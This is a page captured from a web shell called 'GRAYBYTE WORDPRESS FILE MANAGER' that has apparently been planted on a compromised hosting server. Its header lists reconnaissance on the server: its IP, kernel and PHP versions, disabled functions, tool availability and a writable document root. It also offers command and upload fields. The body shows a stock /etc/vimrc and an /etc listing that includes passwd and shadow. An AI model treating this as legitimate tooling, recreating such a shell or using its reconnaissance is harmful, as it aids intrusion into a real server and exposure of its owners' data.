GRAYBYTE WORDPRESS FILE MANAGER9619

Server IP : 149.255.58.128 / Your IP : 216.73.216.207
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /etc/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /etc//vimrc
" When started as "evim", evim.vim will already have done these settings.
if v:progname =~? "evim"
  finish
endif

" Use Vim settings, rather than Vi settings (much better!).
" This must be first, because it changes other options as a side effect.
" Avoid side effects when it was already reset.
if &compatible
  set nocompatible
endif

" When the +eval feature is missing, the set command above will be skipped.
" Use a trick to reset compatible only when the +eval feature is missing.
silent! while 0
  set nocompatible
silent! endwhile

" Allow backspacing over everything in insert mode.
set backspace=indent,eol,start

"set ai			" always set autoindenting on
"set backup		" keep a backup file
set viminfo='20,\"50	" read/write a .viminfo file, don't store more
			" than 50 lines of registers
set history=50		" keep 50 lines of command line history
set ruler		" show the cursor position all the time
set showcmd		" display incomplete commands
set wildmenu		" display completion matches in a status line

set ttimeout		" time out for key codes
set ttimeoutlen=100	" wait up to 100ms after Esc for special key

" Show @@@ in the last line if it is truncated.
set display=truncate

" Show a few lines of context around the cursor.  Note that this makes the
" text scroll if you mouse-click near the start or end of the window.
set scrolloff=5

" Do incremental searching when it's possible to timeout.
if has('reltime')
  set incsearch
endif

" Do not recognize octal numbers for Ctrl-A and Ctrl-X, most users find it
" confusing.
set nrformats-=octal

" Only do this part when compiled with support for autocommands
if has("autocmd")
  augroup redhat
  autocmd!
  " In text files, always limit the width of text to 78 characters
  " autocmd BufRead *.txt set tw=78
  " When editing a file, always jump to the last cursor position
  autocmd BufReadPost *
  \ if line("'\"") > 0 && line ("'\"") <= line("$") |
  \   exe "normal! g'\"" |
  \ endif
  " don't write swapfile on most commonly used directories for NFS mounts or USB sticks
  autocmd BufNewFile,BufReadPre /media/*,/run/media/*,/mnt/* set directory=~/tmp,/var/tmp,/tmp
  " start with spec file template
  " 1724126 - do not open new file with .spec suffix with spec file template
  " apparently there are other file types with .spec suffix, so disable the
  " template
  " autocmd BufNewFile *.spec 0r /usr/share/vim/vimfiles/template.spec
  augroup END
endif

if has("cscope") && filereadable("/usr/bin/cscope")
   set csprg=/usr/bin/cscope
   set csto=0
   set cst
   set nocsverb
   " add any database in current directory
   if filereadable("cscope.out")
      cs add $PWD/cscope.out
   " else add database pointed to by environment
   elseif $CSCOPE_DB != ""
      cs add $CSCOPE_DB
   endif
   set csverb
endif

" Switch syntax highlighting on, when the terminal has colors
" Also switch on highlighting the last used search pattern.
if &t_Co > 2 || has("gui_running")
  " Revert with ":syntax off".
  syntax on

  " I like highlighting strings inside C comments.
  " Revert with ":unlet c_comment_strings".
  let c_comment_strings=1
  set hlsearch
endif

filetype plugin on

if &term=="xterm"
     set t_Co=8
     set t_Sb=[4%dm
     set t_Sf=[3%dm
endif

" Convenient command to see the difference between the current buffer and the
" file it was loaded from, thus the changes you made.
" Only define it when not defined already.
" Revert with: ":delcommand DiffOrig".
if !exists(":DiffOrig")
  command DiffOrig vert new | set bt=nofile | r ++edit # | 0d_ | diffthis
		  \ | wincmd p | diffthis
endif

if has('langmap') && exists('+langremap')
  " Prevent that the langmap option applies to characters that result from a
  " mapping.  If set (default), this may break plugins (but it's backward
  " compatible).
  set nolangremap
endif

" Don't wake up system with blinking cursor:
let &guicursor = &guicursor . ",a:blinkon0"

" Source a global configuration file if available
if filereadable("/etc/vimrc.local")
  source /etc/vimrc.local
endif

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
February 08 2024 03:37:04
0 / root
0755
alternatives
--
November 12 2024 15:37:17
0 / root
0755
apache2
--
May 13 2024 09:32:27
0 / root
0755
bash_completion.d
--
May 21 2025 21:44:08
0 / root
0755
cl.nodejs
--
October 13 2023 17:04:23
0 / root
0755
cl.php.d
--
September 10 2024 11:42:01
1032 / wheelch2
0755
cl.python
--
February 05 2024 20:10:19
0 / root
0755
cl.selector
--
September 10 2024 11:42:01
1032 / wheelch2
0755
cl.selector.conf.d
--
May 01 2025 21:42:34
0 / root
0755
cpanel
--
May 21 2025 21:42:09
0 / root
0751
crypto-policies
--
November 12 2024 13:11:10
0 / root
0755
default
--
December 04 2024 22:44:57
0 / root
0755
environment-modules
--
May 05 2024 10:07:53
0 / root
0755
fonts
--
May 21 2025 21:44:07
0 / root
0755
gcrypt
--
October 01 2024 16:43:35
0 / root
0755
ld.so.conf.d
--
April 28 2025 16:07:12
0 / root
0755
mail
--
February 05 2024 20:01:25
0 / root
0755
modulefiles
--
September 27 2023 15:12:39
0 / root
0755
motd.d
--
November 25 2024 21:25:08
0 / root
0755
my.cnf.d
--
May 07 2025 09:08:31
0 / root
0755
openldap
--
May 21 2025 21:44:08
0 / root
0755
pam.d
--
May 21 2025 21:44:07
0 / root
0755
pki
--
February 05 2024 20:02:54
0 / root
0755
profile.d
--
May 21 2025 21:44:08
0 / root
0755
sasl2
--
April 10 2023 14:10:38
0 / root
0755
scl
--
May 21 2025 21:44:08
0 / root
0755
security
--
May 21 2025 21:44:07
0 / root
0755
skel
--
May 21 2025 21:44:06
0 / root
0755
snmp
--
May 21 2025 21:44:08
0 / root
0755
ssh
--
May 21 2025 21:44:07
0 / root
0755
ssl
--
May 21 2025 21:44:07
0 / root
0755
sysconfig
--
May 21 2025 21:44:08
0 / root
0755
.etc.version
0.004 KB
May 21 2025 21:44:08
0 / root
0600
DIR_COLORS
4.563 KB
October 02 2024 21:42:21
0 / root
0644
aliases
1.493 KB
June 23 2020 06:11:43
0 / root
0644
at.deny
0.001 KB
May 05 2024 10:07:52
0 / root
0644
backupmxhosts
0 KB
May 05 2024 10:07:52
0 / mail
0640
bashrc
3.378 KB
May 05 2024 10:07:52
0 / root
0644
domainusers
3.755 KB
May 21 2025 21:43:15
0 / mail
0640
environment
0 KB
April 03 2024 18:29:31
0 / root
0644
group
0.499 KB
May 21 2025 21:44:12
0 / root
0644
host.conf
0.009 KB
June 23 2020 06:11:43
0 / root
0644
hosts
0.195 KB
May 21 2025 21:43:17
0 / root
0644
inputrc
0.921 KB
June 23 2020 06:11:43
0 / root
0644
ld.so.cache
41.464 KB
May 21 2025 21:42:18
0 / root
0644
ld.so.conf
0.027 KB
April 28 2025 15:59:48
0 / root
0644
localtime
3.578 KB
March 31 2025 03:48:56
0 / root
0644
mailcap
0.266 KB
May 05 2024 10:07:53
0 / root
0644
mailhelo
0.026 KB
May 21 2025 21:43:15
0 / mail
0640
mailips
0 KB
May 21 2025 21:43:15
0 / mail
0640
mime.types
65.873 KB
May 05 2024 10:07:53
0 / root
0644
my.cnf
0.78 KB
May 07 2025 09:09:04
0 / root
0644
passwd
1.283 KB
May 21 2025 21:44:12
0 / root
0644
profile
2.637 KB
May 05 2024 10:07:53
0 / root
0644
protocols
6.414 KB
June 23 2020 06:11:43
0 / root
0644
resolv.conf
0.089 KB
April 06 2025 07:46:06
0 / root
0644
rpc
1.596 KB
August 02 2021 01:33:43
0 / root
0644
screenrc
6.563 KB
January 30 2023 11:37:56
0 / root
0644
senderverifybypasshosts
0 KB
May 05 2024 10:07:54
0 / mail
0640
services
676.027 KB
June 23 2020 06:11:43
0 / root
0644
shadow
0.817 KB
May 21 2025 21:44:12
0 / root
0600
skipsmtpcheckhosts
0.001 KB
May 05 2024 10:07:54
0 / mail
0640
spammeripblocks
0 KB
May 05 2024 10:07:54
0 / mail
0640
trusted-key.key
0.366 KB
February 19 2025 16:04:22
0 / root
0644
trustedmailhosts
0 KB
April 25 2025 21:43:09
0 / mail
0640
vimrc
3.923 KB
October 02 2024 23:01:02
0 / root
0644
virc
1.156 KB
October 02 2024 23:01:02
0 / root
0644
wgetrc
4.81 KB
September 03 2024 11:57:33
0 / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF